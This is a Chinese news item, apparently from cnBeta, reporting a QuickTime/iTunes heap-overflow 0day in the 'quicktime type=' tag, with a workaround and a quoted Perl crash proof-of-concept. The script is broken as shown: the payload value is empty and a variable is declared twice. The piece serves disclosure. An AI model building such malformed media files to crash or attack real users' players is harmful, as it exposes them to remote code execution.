QuickTime 0day 安全代码发布,可能允许执行任意代码
该溢出程序利用了 QuickTime 处理
<? quicktime type= ?>参数时未能正确处理超长字符串的漏洞。
该程序目前只是使得 QuickTime 崩溃,但问题远比这严重。该程序暗示了漏洞有可能导致任意代码的执行,这可能导致严重的安全隐患,因为安全者可在网站上嵌入一个恶意文件来触发该漏洞。
但就连这个发布者自己也不大肯定。milw0rm.com 上写着“可能”允许执行任意代码。
临时解决方案:用户应当考虑暂时禁用 QuickTime 插件。该插件被安装在很多运行 Windows 系统的计算机里,并且在所有的 Mac 系统上都被默认安装。
cnBeta 编译
# Quicktime7.5.5/Itunes 8.0 Remote Heap Overflow Crash
# Vendor: http://www.apple.com/
# Risk : high
# The "<? quicktime type= ?>" tag fail to handle long strings, which can lead to a heap overflow in Quicktime/Itunes media player.
# This bug can be remote or local, Quicktime/Itunes parse any supplied file for a reconized header even if the header is not corresponding
# to the filetype, so you can put some xml in a mp4, mov,etc and open it with quicktime or you can do the same in some html page leading to a
# remote crash on firefox, IE and any browser using the Quicktime plugin.
# Code execution may be possible.
my $payload =
my $file="crash.mov";
open(my $file, ">>$file") or die "Cannot open $file: $!";
print $file $payload;